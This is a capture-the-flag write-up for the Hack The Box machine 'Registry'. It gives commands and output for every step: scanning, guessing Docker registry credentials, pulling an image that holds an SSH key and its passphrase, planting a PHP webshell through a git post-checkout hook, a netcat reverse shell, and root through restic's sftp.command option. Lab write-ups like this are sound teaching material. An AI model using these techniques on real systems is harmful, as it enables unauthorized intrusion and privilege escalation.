Registry - Hack The Box
This writeup is outdated and the attack path presented for user bolt has been patched. Initially once we pivoted from the bolt user to www-data we could run restic as root and abuse the sftp.command parameter to execute any command as root.
Portscan
root@kali:~# nmap -T4 -sC -sV -p- 10.10.10.159
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-20 19:05 EDT
Nmap scan report for registry.htb (10.10.10.159)
Host is up (0.044s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
| 256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
|_ 256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
443/tcp open ssl/http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=docker.registry.htb
| Not valid before: 2019-05-06T21:14:35
|_Not valid after: 2029-05-03T21:14:35
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.27 seconds
Website
There’s a default nginx page shown on both port 80 and port 443:
The SSL certificate contains docker.registry.htb which I’ll add to my /etc/hosts file.
Website dirbust
root@kali:~# rustbuster dir -w /opt/SecLists/Discovery/Web-Content/big.txt -e php --no-banner \
> -u http://registry.htb
~ rustbuster v3.0.3 ~ by phra & ps1dr3x ~
[?] Started at : 2019-10-20 19:09:36
GET 403 Forbidden http://registry.htb/.bash_history
GET 403 Forbidden http://registry.htb/.htaccess
GET 403 Forbidden http://registry.htb/.htpasswd
GET 200 OK http://registry.htb/backup.php
GET 301 Moved Permanently http://registry.htb/install
=> http://registry.htb/install/
The /backup.php page doesn’t display anything with my web browser. Maybe it’s supposed to be included as part of another file or it does something in the background but doesn’t output anything.
The /install link shows a bunch of gibberish so it’s probably a binary file that I’m supposed to download and analyze.
Hint from the compressed archive
I figure out that it’s a compressed file by running file then I can extract it and see it contains a certificate and a readme file.
root@kali:~/htb/registry# file install
install: gzip compressed data, last modified: Mon Jul 29 23:38:20 2019
root@kali:~/htb/registry# mv install install.tar.gz
root@kali:~/htb/registry# tar xvf install.tar.gz
gzip: stdin: unexpected end of file
ca.crt
readme.md
tar: Child returned status 1
tar: Error is not recoverable: exiting now
readme.md contains some kind of hint as to what the box is about: docker has a private registry software
# Private Docker Registry
- https://docs.docker.com/registry/deploying/
- https://docs.docker.com/engine/security/certificates/
Docker registry
When I got to https://docker.registry.htb/ I just see a blank page so I’ll run gobuster again to find files.
root@kali:~/htb/registry# rustbuster dir -w /opt/SecLists/Discovery/Web-Content/big.txt --no-banner \
> -k -u https://docker.registry.htb
~ rustbuster v3.0.3 ~ by phra & ps1dr3x ~
[?] Started at : 2019-10-20 19:19:10
GET 301 Moved Permanently https://docker.registry.htb/v2
=> /v2/
The /v2 page has HTTP basic auth but I was able to guess the admin / admin credentials. However I get an empty JSON object when I query the page.
root@kali:~/htb/registry# curl -u admin:admin -k https://docker.registry.htb/v2/
{}
I’m pretty sure this a Docker Registry installation based on the name of the box, the hint from the file and the directory discovered.
To interact with the registry without doing API calls manually I’ll use the registry-cli tool.
root@kali:~/htb/registry# registry.py -l admin:admin -r https://docker.registry.htb --no-validate-ssl
---------------------------------
Image: bolt-image
tag: latest
There’s a docker image called bolt-image present in the registry. I’ll download it to my own box so I can execute it and see if there is anything interesting in it.
root@kali:~/htb/registry# docker login -u admin -p admin docker.registry.htb
WARNING! Using --password via the CLI is insecure. Use --password-stdin.
WARNING! Your password will be stored unencrypted in /root/.docker/config.json.
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/#credentials-store
Login Succeeded
root@kali:~/htb/registry# docker pull docker.registry.htb/bolt-image:latest
latest: Pulling from bolt-image
f476d66f5408: Pull complete
8882c27f669e: Pull complete
d9af21273955: Pull complete
f5029279ec12: Pull complete
2931a8b44e49: Pull complete
c71b0b975ab8: Pull complete
02666a14e1b5: Pull complete
3f12770883a6: Pull complete
302bfcb3f10c: Pull complete
Digest: sha256:eeff225e5fae33dc832c3f82fd8b0db363a73eac4f0f0cb587094be54050539b
Status: Downloaded newer image for docker.registry.htb/bolt-image:latest
I’ll launch the container in interactive mode so I can look around easily:
root@kali:~/htb/registry# docker image list
REPOSITORY TAG IMAGE ID CREATED SIZE
anoxis/registry-cli latest c8ecf313a6be 2 months ago 73.6MB
docker.registry.htb/bolt-image latest 601499e98a60 4 months ago 362MB
root@kali:~/htb/registry# docker run -ti 601499e98a60 /bin/bash
root@4195e2eb99fe:/#
There’s an encrypted SSH private key in /root/.ssh:
root@4195e2eb99fe:~/.ssh# cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,1C98FA248505F287CCC597A59CF83AB9
KF9YHXRjDZ35Q9ybzkhcUNKF8DSZ+aNLYXPL3kgdqlUqwfpqpbVdHbMeDk7qbS7w
KhUv4Gj22O1t3koy9z0J0LpVM8NLMgVZhTj1eAlJO72dKBNNv5D4qkIDANmZeAGv
[...]
RLI9xScv6aJan6xHS+nWgxpPA7YNo2rknk/ZeUnWXSTLYyrC43dyPS4FvG8N0H1V
94Vcvj5Kmzv0FxwVu4epWNkLTZCJPBszTKiaEWWS+OLDh7lrcmm+GP54MsLBWVpr
-----END RSA PRIVATE KEY-----
There’s a profile file containing the SSH password for the private key:
root@4195e2eb99fe:/etc/profile.d# ls -l
total 8
-rw-r--r-- 1 root root 96 Aug 20 2018 01-locale-fix.sh
-rwxr-xr-x 1 root root 222 May 25 01:25 01-ssh.sh
root@4195e2eb99fe:/etc/profile.d# cat 01-ssh.sh
#!/usr/bin/expect -f
#eval `ssh-agent -s`
spawn ssh-add /root/.ssh/id_rsa
expect "Enter passphrase for /root/.ssh/id_rsa:"
send "GkOcz221Ftb3ugog\n";
expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
interact
Password is: GkOcz221Ftb3ugog
There’s also a sync.sh but it doesn’t seem to do anything:
root@4195e2eb99fe:/var/www/html# cat sync.sh
#!/bin/bash
rsync -azP registry:/var/www/html/bolt .
Login in as user bolt
With the private key and password I found I’m able to SSH to the box with the user bolt:
root@kali:~/htb/registry# ssh -i id_rsa bolt@10.10.10.159
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-29-generic x86_64)
Last login: Sun Oct 20 23:05:17 2019 from 10.10.14.20
bolt@bolt:~$ id
uid=1001(bolt) gid=1001(bolt) groups=1001(bolt)
bolt@bolt:~$ cat user.txt
ytc0ytdmnzywnzgxngi0zte0otm3ywzi
Enumeration as user bolt
The backup.php file I found earlier executes a backup application with sudo:
bolt@bolt:/var/www/html$ cat backup.php
<?php shell_exec("sudo restic backup -r rest:http://backup.registry.htb/bolt bolt");
Unfortunately my current bolt doesn’t have rights to sudo that specific command but I have the following:
bolt@bolt:/var/www/html$ sudo -l
Matching Defaults entries for bolt on bolt:
env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bolt may run the following commands on bolt:
(git) NOPASSWD: /usr/bin/git checkout *
Escalating to www-data using the git post-checkout hooks
Since I can execute git checkout as user git I can exploit the post-checkout hooks to get RCE. I’ll just create a webshell so I can run commands as www-data:
bolt@bolt:/var/tmp$ cd /var/tmp
bolt@bolt:/var/tmp$ mkdir a
bolt@bolt:/var/tmp$ cd a
bolt@bolt:/var/tmp/a$ git init
Initialized empty Git repository in /var/tmp/a/.git/
bolt@bolt:/var/tmp/a$ touch blabla
bolt@bolt:/var/tmp/a$ git add blabla
bolt@bolt:/var/tmp/a$ git commit -m 'yo'
*** Please tell me who you are.
Run
git config --global user.email "you@example.com"
git config --global user.name "Your Name"
to set your account's default identity.
Omit --global to set the identity only in this repository.
fatal: empty ident name (for <bolt@bolt>) not allowed
bolt@bolt:/var/tmp/a$ vi .git/hooks/post-checkout
bolt@bolt:/var/tmp/a$ chmod 755 .git/hooks/post-checkout
bolt@bolt:/var/tmp/a$ chmod -R 777 *
bolt@bolt:/var/tmp/a$ chmod -R 777 .git/
bolt@bolt:/var/tmp/a$ sudo -u git /usr/bin/git checkout *
error: unable to unlink old 'blabla': Permission denied
bolt@bolt:/var/tmp/a$ ls -l /var/www/html/snow.php
-rw-r--r-- 1 git www-data 29 Oct 20 23:43 /var/www/html/snow.php
bolt@bolt:/var/tmp/a$ cat /var/www/html/snow.php
<?php system($_GET["c"]) ?>;
I tried to get a reverse shell but I couldn’t so I assume there is a firewall blocking outbound connection. No matter, there is netcat already on the box so I can start a local listener as user bolt and proceed from there. I created a /tmp/shell.sh that contains a standard reverse shell using netcat and called it from my webshell.
bolt@bolt:~$ nc -lvnp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 127.0.0.1 60286 received!
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Privilege escalation
More sudo privileges! This is probably the way to get root access. I need to abuse the restic backup system to get RCE as root.
$ sudo -l
Matching Defaults entries for www-data on bolt:
env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\:[...]
User www-data may run the following commands on bolt:
(root) NOPASSWD: /usr/bin/restic backup -r rest*
Unintended method
We can pass special parameters to the restic backup application to specify how we want to establish the SSH connection for remote backups. By abusing this parameter we can effectively run any command we want as root. In this case I’ll just call another reverse shell back to me and gain root access.
sudo /usr/bin/restic backup -r rest/ -r sftp:bolt@127.0.0.1:/var/tmp/xyz -o sftp.command="/tmp/shell.sh" /root/root.txt